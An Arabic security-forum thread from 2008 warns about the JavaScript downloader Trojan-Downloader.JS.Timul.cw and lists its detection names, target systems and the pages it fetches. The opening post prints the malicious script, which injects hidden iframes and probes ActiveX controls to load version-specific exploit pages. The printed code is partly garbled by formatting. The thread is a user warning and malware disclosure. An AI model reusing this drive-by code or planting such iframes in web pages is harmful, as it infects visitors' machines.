1. الإدارة العامة

    صفحة منتديات زيزووم للأمن والحماية

  2. الإدارة العامة

    الصفحة الرسمية لمنتديات زيزووم للأمن والحماية الفيس بوك

  3. الإدارة العامة

    الصفحة الرسمية لمنتديات زيزووم للأمن والحماية التلكرام

الخطير Trojan-Downloader.JS.Timul.cw يغزو أجهزه العالم

الموضوع في 'منتدى نقاشات واختبارات برامج الحماية' بواسطة himoScript, بتاريخ ‏أكتوبر 16, 2008.

حالة الموضوع:
مغلق
  1. himoScript

    himoScript زيزوومى مميز

    إنضم إلينا في:
    ‏مايو 3, 2008
    المشاركات:
    673
    الإعجابات :
    169
    نقاط الجائزة:
    550
    الجنس:
    ذكر
    الإقامة:
    معشوقتى الاولى وامى (مصر)
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 8


    السلام عليكم


    بخش بالموضوع



    ---- تم الكش عن تروجن او ثغره او ملف ضار اليوم
    ---- المهم شباب ليس ملف عادى ولا يعمل بالنظام
    ----المهم شباب انه يصيب صفحات الهتمل وبذلك يصاب به جهازج


    ------
    التقارير
    ----------
    Alias:
    • Mcafee: Exploit-IFrame trojan
    • Kaspersky: Trojan-Downloader.JS.Timul.cw
    • F-Secure: Trojan-Downloader.JS.Timul.cw
    • Grisoft: Exploit
    • Bitdefender: Trojan.Exploit.JS.O


    Platforms / OS:
    • Windows 95
    • Windows 98
    • Windows 98 SE
    • Windows NT
    • Windows ME
    • Windows 2000
    • Windows XP
    • Windows 2003


    Side effects:
    • Downloads malicious files

    Files
    It tries to download some files:

    – The is the following:
    • %visited URL%/flash.htm
    At the time of writing this file was not online for further investigation.

    – The is the following:
    • %visited URL%/14.htm
    At the time of writing this file was not online for further investigation.

    – The is the following:
    • %visited URL%/office.htm
    At the time of writing this file was not online for further investigation.

    – The is the following:
    • %visited URL%/nt.htm
    At the time of writing this file was not online for further investigation.

    – The is the following:
    • %visited URL%/re10.htm
    At the time of writing this file was not online for further investigation.

    – The is the following:
    • %visited URL%/re11.htm
    At the time of writing this file was not online for further investigation.







    السورس للكود الضار او الثغره


    كود PHP:
    script>
    document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
    document.write("<iframe width=20 height=0 src=sina.htm></iframe>");
    status="حê³ة";
    onerror=function(){return true;}
    if(
    navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
    document.write("<iframe width=20 height=0 src=14.htm></iframe>");
    document.write("<iframe width=20 height=0 src=office.htm></iframe>");
    try{var 
    f;
    var 
    qw=new ActiveX("GLIEDown.IEDown.1");}
    catch(
    f){};                      
    finally{if(
    f!="[ Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
    try{var 
    m;
    var 
    hq=new ActiveX("Downloader.DLoader.1");}
    catch(
    m){};                      
    finally{if(
    m!="[ Error]"){document.write("<iframe width=100 height=0 src=sina.htm></iframe>");}}
    function 
    test()
    {
    rrooxx "IER" "PCtl.I" "ERP" "Ctl.1";
    try
    {
    Like = new ActiveX(rrooxx);
    }catch(
    error){return;}
    vvvvv Like.PlayerProperty("PRODUCTVERSION");
    if(
    vvvvv<="6.0.14.552")
    document.write("<iframe width=100 height=0 src=re10.htm></iframe>");
    else
    document.write("<iframe width=100 height=0 src=re11.htm></iframe>");

    }
    test();


    لايوجد حل لهذه المشكله حتى الأن

    حيث ان الملف لايصيب الجهاز

    لانتكلم من فراغ فهذا دليل على كلامى

    المصدر

    http://www.avira.com/en/threats/section/fulldetails/id_vir/4340/html_iframe.800.html
     
  2. Al jNtEeL

    Al jNtEeL زيزوومى فضى

    إنضم إلينا في:
    ‏نوفمبر 1, 2007
    المشاركات:
    7,299
    الإعجابات :
    67
    نقاط الجائزة:
    840
    الإقامة:
    |-Al Hilal Club-|
    برامج الحماية:
    Norton
    نظام التشغيل:
    Windows 7
    بارك الله فيك وكفانا الله شره ^_^

    بعد اذنك ينقل لـ القسم الأنسب

    بالتوفيق
     
  3. الديبلوماسي

    الديبلوماسي زيزوومى فضى

    إنضم إلينا في:
    ‏سبتمبر 14, 2008
    المشاركات:
    3,502
    الإعجابات :
    61
    نقاط الجائزة:
    840
    الإقامة:
    ksa
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 7
    بــاركــ اللــه فيــكــ

    والله يجزاك الفردوس الأعلى ..
     
  4. himoScript

    himoScript زيزوومى مميز

    إنضم إلينا في:
    ‏مايو 3, 2008
    المشاركات:
    673
    الإعجابات :
    169
    نقاط الجائزة:
    550
    الجنس:
    ذكر
    الإقامة:
    معشوقتى الاولى وامى (مصر)
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 8
    باك الله فيكم
    وشاكر مروركم
     
  5. sunny

    sunny زيزوومي جديد

    إنضم إلينا في:
    ‏ديسمبر 6, 2007
    المشاركات:
    37
    الإعجابات :
    10
    نقاط الجائزة:
    50
    الجنس:
    ذكر
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 10
    بارك الله فيك .. والله يكفينا شره
     
  6. عاشق 2

    عاشق 2 زيزوومى محترف

    إنضم إلينا في:
    ‏يونيو 4, 2008
    المشاركات:
    2,538
    الإعجابات :
    28
    نقاط الجائزة:
    780
    الإقامة:
    K . S . A
    برامج الحماية:
    Norton
    نظام التشغيل:
    Windows XP
    بارك الله فيك
    وشكرا على التنبية​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...